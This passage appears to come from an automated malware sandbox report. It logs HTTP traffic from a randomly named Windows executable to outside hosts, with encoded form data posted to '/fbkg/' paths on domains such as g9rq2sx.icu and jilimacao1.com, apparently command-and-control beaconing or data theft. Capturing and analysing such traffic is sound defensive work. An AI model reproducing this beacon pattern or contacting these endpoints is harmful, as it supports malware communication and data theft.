                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFjf7HnMmpImS/sYFvboYI46BgNr9pwNko7GFZZZ3eUk/Gn61JUxvrLLMq9dHXxXhXKRlD+CKwNTjJG8spPR1HrQVVTfZu+Tsq49cxopmR8HHU83vAy7EhxgrMvs3pdqyAvEg1rKV7yiYUMV13cQ403MSoXTLmVx2akK7mS75hDvPbtlN1ri3adYiVW+mNAdV8uC8WNf6VhHdSkkrU98MmhLnHVlPLYEhyJ1aiFuipzCCXV3aztHNcVyynVTGvdf/jJHPbb6rkOCHLGN5BHkxh+oGyg712cnxNIirXmF/jNzjPV9NTgyIXw9+EZG19feY2kJINmA4MrctPglAtbeJ3uPrE5MDN+wTCu7O1MKxXyCtJPx5KpIvL38Mt6LK3xvrlafjnrL5N8UWp4sdpM3DtQW4R2k39FkbZRBBSgR+WD3tzENZUUjGSU3X+aO28QGpLONrTwIFGmvYNtV1kSJFgjxb1qtosQEEZCrwn6xTVaOANXEnOkQBJzUraMqkpDspULcAFZzidX+DTbzqXZfcYmUZho+rOtdHos3tFk0cXMzWsiqQ+k0nsjVzubrZDq84KHLioN2QpfryTaUVOZH/CMW3s7QVeIV8S8LZrg6Ryi8P0tPbsDnnGElY0qmebzSziB8mF7h51sOOzzFZ2hRoDWgI2TnPXSKtd+frX4uQHEiXe3sir8ohYEwmjAcen+fo73qazSRd6tK1Qpn/19JagxtSsghyK+rAoO/XqaWtp0+tTa/vr8xNGpq3C+n8giBSqMGqrX3B8uPs6uv7OdYrXY+Lc1e33u6UcIJjM/zpC90te
                                                                                                                                                                                                Nov 17, 2023 19:27:21.341933966 CET506OUTData Raw: 4a 2b 6d 42 34 2f 66 74 4d 70 4f 5a 6a 74 44 62 78 36 50 41 53 46 63 72 42 47 2f 49 53 7a 43 57 55 76 43 42 62 65 71 32 79 42 4d 36 6a 61 4d 34 38 49 51 48 55 77 7a 70 37 57 6f 46 2f 66 33 72 2f 62 75 61 4d 50 33 71 66 69 50 34 5a 59 47 56 36 63
                                                                                                                                                                                                Data Ascii: J+mB4/ftMpOZjtDbx6PASFcrBG/ISzCWUvCBbeq2yBM6jaM48IQHUwzp7WoF/f3r/buaMP3qfiP4ZYGV6cqJS+O/D3sl9kJ1/nrOjY/QtgrpO+BJ7vYX10t6bpwgt227DBdP+phGBAelkcY79Qf0KHsf7112zZweOSRLfCCrGfkweVT9pJ7z/uuheeFysENQHmGkkxRXQeMOyDbG9wJO7jAroCa0j/d2CS+T7W5AxtrebRlXSFC
                                                                                                                                                                                                Nov 17, 2023 19:27:21.342120886 CET507OUTData Raw: 35 35 67 53 46 30 6f 58 38 42 45 5a 79 65 6a 30 66 76 68 62 42 72 34 6e 56 6e 51 42 43 31 6f 30 32 70 74 48 30 39 31 68 4a 73 6e 32 42 41 61 4e 63 52 50 42 57 7a 79 65 45 38 75 61 43 6a 2b 2f 5a 50 70 44 69 33 75 59 77 53 58 41 34 4f 66 53 57 58
                                                                                                                                                                                                Data Ascii: 55gSF0oX8BEZyej0fvhbBr4nVnQBC1o02ptH091hJsn2BAaNcRPBWzyeE8uaCj+/ZPpDi3uYwSXA4OfSWX0bpRhG/Cqd6FPz23r/T6JHO2cEm7W3J2cXI10+zBCsBNC+l5T0CVHauiWx4lzFXZTqGgUhh3M1l6+/yAVb1/XiEWQDi2bFPr5v6VLV3WxIL5PRPm9Bbv7bEN1FWP2DZ7tg9/kIaXNrydI96y3dJzeMqY6Zwseb+Nn
                                                                                                                                                                                                Nov 17, 2023 19:27:21.730333090 CET509OUTData Raw: 79 4c 79 6a 44 67 55 65 5a 64 55 6c 6c 39 6e 42 42 76 65 66 51 39 44 48 52 69 45 33 6b 47 70 52 64 4e 49 64 5a 56 65 2b 33 64 53 35 73 74 51 51 38 49 4c 46 45 77 4b 79 73 4e 34 31 4b 46 59 4f 6d 34 68 6b 7a 56 6a 73 74 59 41 32 6c 54 6d 71 2f 5a
                                                                                                                                                                                                Data Ascii: yLyjDgUeZdUll9nBBvefQ9DHRiE3kGpRdNIdZVe+3dS5stQQ8ILFEwKysN41KFYOm4hkzVjstYA2lTmq/ZsLkujZit9e8CYNM55GaGKaOBbTwlXGMXNLh83WhdEgHdUjfmJer20rVBf+OLOjJ/ZdHxsViRohP5Qu/SaVtaNxRllyXtRNC7AK/T3ddKLDP+0wHQDYhoRMn5NXQ9mzpj+0UcqDOBAmDfKuIWlChvtAmj+M7BdkEp+
                                                                                                                                                                                                Nov 17, 2023 19:27:22.881486893 CET510OUTData Raw: 69 55 68 56 50 42 75 70 6d 77 70 66 5a 41 49 75 69 49 30 65 6f 7a 45 30 42 4f 6e 54 74 53 44 67 4c 54 69 71 37 77 63 31 47 71 58 6f 6c 61 43 7a 53 6a 69 46 38 6f 35 53 2b 32 4c 55 71 69 79 39 74 65 33 6d 46 4e 69 79 79 4d 4a 57 62 34 71 36 30 4d
                                                                                                                                                                                                Data Ascii: iUhVPBupmwpfZAIuiI0eozE0BOnTtSDgLTiq7wc1GqXolaCzSjiF8o5S+2LUqiy9te3mFNiyyMJWb4q60Mjwe6hqiraqnSD2IxoTk0vpfLpMYw26iMXKNComkGjXm9xgXU9yyvo2HrDZ/MWbysJ2d9eYmjLVYoTN5JzLLUBbQMUzh/sHnbT5p4dzmTAad9Vmv/sE6tXDoEwVWnRjTL5nmLCAMUFeianLw+79+SDaqtZICVBLl6b
                                                                                                                                                                                                Nov 17, 2023 19:27:23.263884068 CET513OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:26.677519083 CET514OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:33.504590988 CET516OUTData Raw: 74 63 76 53 6d 57 68 37 33 6b 2b 35 39 77 36 38 32 2b 38 75 78 67 58 4e 39 73 44 74 73 78 6f 37 74 65 62 6c 74 4e 37 42 58 39 4e 4e 67 31 52 79 30 62 78 77 2b 4e 66 69 66 69 43 50 59 44 52 6d 30 39 2b 63 32 68 64 77 6b 59 6b 38 55 39 4e 6b 46 5a
                                                                                                                                                                                                Data Ascii: tcvSmWh73k+59w682+8uxgXN9sDtsxo7tebltN7BX9NNg1Ry0bxw+NfifiCPYDRm09+c2hdwkYk8U9NkFZUKAtlcmDNSSo/krA8RZte988nq6bM2QnSOWgdkPzGYkyvcc+w8DoXtEgugqpYHKyJ7tdvvGydFN1IPq7WAC4j5NmoCi7gza18n/vMXyjUmHox690WpFZ2aFpKH6S4KqYyM9jX1WOLm7Vp98Exekgig/2rXifv/61Q
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883182049 CET518OUTData Raw: 67 4e 67 4a 72 54 5a 77 71 6e 48 4e 2b 45 73 72 4a 63 2f 6e 61 7a 57 63 52 59 44 6b 39 76 4b 30 5a 6f 79 66 43 66 66 63 42 69 52 4b 31 62 63 4f 2b 47 70 6a 74 71 50 36 37 2f 52 45 36 54 7a 4c 73 45 73 79 54 34 30 38 43 44 4b 39 30 54 6b 6b 48 66
                                                                                                                                                                                                Data Ascii: gNgJrTZwqnHN+EsrJc/nazWcRYDk9vK0ZoyfCffcBiRK1bcO+GpjtqP67/RE6TzLsEsyT408CDK90TkkHf53bJc8s+CWNIdffLA5xf+8GBbYU0igR8579TrQTmbOzHaQx+ykswaUJqfATlNp48AL7GePxcrd0MPxLNJdbCx3Ct7ZU4P9z8bB+xsBIqJ+YOKgUo9Rr0m/IJeaPRu4zjr5fCLDlwhFzJ0iYJ1sodllAv3jGTD0u+K
                                                                                                                                                                                                Nov 17, 2023 19:27:33.883304119 CET520OUTData Raw: 66 55 59 56 47 33 33 6f 6c 39 46 4c 36 77 73 62 72 64 54 75 55 34 52 46 68 53 63 73 56 65 59 64 71 55 77 30 76 7a 52 51 6b 33 43 6a 4a 6a 67 7a 4e 4c 6f 6f 34 36 64 4a 56 58 31 6f 51 70 79 4b 4c 52 2f 59 49 66 45 69 37 63 6c 46 37 79 31 45 51 30
                                                                                                                                                                                                Data Ascii: fUYVG33ol9FL6wsbrdTuU4RFhScsVeYdqUw0vzRQk3CjJjgzNLoo46dJVX1oQpyKLR/YIfEi7clF7y1EQ0U/d3x/uq781cwxq/PEQQIAgylYbS9JC4Rc9eQh/NqftjnnVYY8DN/sKjDGzaGTH3yhqv4LkSX37MMb6z7ePdwFFg589RCgtRznbjnTp0kni64oAAmi20Xw8PkZABKyqkaJJh7hQQrcQgWxqweFzcIWXVRIv1b62Ch


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1838.163.97.880192.168.11.2050145C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:21.389405012 CET508OUTGET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:27:42.805274010 CET536INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 31 61 39 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 2c 63 6b 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 2c 63 6b 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 64 6e 65 77 2e 6f 73 73 2d 63 6e 2d 68 6f 6e 67 6b 6f 6e 67 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 74 7a 39 39 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1a9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K9OKGtG5GpJWrGES",ck:"K9OKGtG5GpJWrGES"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K4PxMd2jqlRM9WRk",ck:"K4PxMd2jqlRM9WRk"})</script><script charset="UTF-8" id="LA_COLLECT" src="https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.js"></script>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                18192.168.11.205014538.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:21.389405012 CET508OUTGET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:27:42.805274010 CET536INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 31 61 39 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 2c 63 6b 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 2c 63 6b 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 64 6e 65 77 2e 6f 73 73 2d 63 6e 2d 68 6f 6e 67 6b 6f 6e 67 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 74 7a 39 39 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1a9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K9OKGtG5GpJWrGES",ck:"K9OKGtG5GpJWrGES"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K4PxMd2jqlRM9WRk",ck:"K4PxMd2jqlRM9WRk"})</script><script charset="UTF-8" id="LA_COLLECT" src="https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.js"></script>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                19192.168.11.205014634.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:48.975980997 CET537OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 69 39 2f 43 57 6d 44 53 56 50 71 65 35 4a 31 4e 52 4d 68 53 59 6e 68 34 31 62 76 6b 74 59 46 44 45 72 31 6d 70 67 4a 68 32 5a 55 43 56 58 47 48 65 44 44 45 32 65 44 6e 4d 6c 71 58 41 72 53 79 31 33 44 79 6a 37 6b 61 2b 58 35 74 35 62 78 7a 4d 72 51 65 2b 5a 51 34 74 76 48 77 2b 6c 66 38 73 4f 54 36 6c 75 79 6e 70 63 4e 31 33 63 77 46 59 41 48 4f 58 4c 39 77 4a 38 76 47 6b 4a 73 70 76 6c 46 4b 76 63 58 6c 49 4d 71 36 48 78 70 61 4d 63 67 6c 61 50 5a 34 66 6f 77 6d 6f 57 48 48 5a 44 64 4f 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfi9/CWmDSVPqe5J1NRMhSYnh41bvktYFDEr1mpgJh2ZUCVXGHeDDE2eDnMlqXArSy13Dyj7ka+X5t5bxzMrQe+ZQ4tvHw+lf8sOT6luynpcN13cwFYAHOXL9wJ8vGkJspvlFKvcXlIMq6HxpaMcglaPZ4fowmoWHHZDdOQ==
                                                                                                                                                                                                Nov 17, 2023 19:27:49.399677038 CET538INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:49 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1934.126.191.8480192.168.11.2050146C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:48.975980997 CET537OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 69 39 2f 43 57 6d 44 53 56 50 71 65 35 4a 31 4e 52 4d 68 53 59 6e 68 34 31 62 76 6b 74 59 46 44 45 72 31 6d 70 67 4a 68 32 5a 55 43 56 58 47 48 65 44 44 45 32 65 44 6e 4d 6c 71 58 41 72 53 79 31 33 44 79 6a 37 6b 61 2b 58 35 74 35 62 78 7a 4d 72 51 65 2b 5a 51 34 74 76 48 77 2b 6c 66 38 73 4f 54 36 6c 75 79 6e 70 63 4e 31 33 63 77 46 59 41 48 4f 58 4c 39 77 4a 38 76 47 6b 4a 73 70 76 6c 46 4b 76 63 58 6c 49 4d 71 36 48 78 70 61 4d 63 67 6c 61 50 5a 34 66 6f 77 6d 6f 57 48 48 5a 44 64 4f 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfi9/CWmDSVPqe5J1NRMhSYnh41bvktYFDEr1mpgJh2ZUCVXGHeDDE2eDnMlqXArSy13Dyj7ka+X5t5bxzMrQe+ZQ4tvHw+lf8sOT6luynpcN13cwFYAHOXL9wJ8vGkJspvlFKvcXlIMq6HxpaMcglaPZ4fowmoWHHZDdOQ==
                                                                                                                                                                                                Nov 17, 2023 19:27:49.399677038 CET538INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:49 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
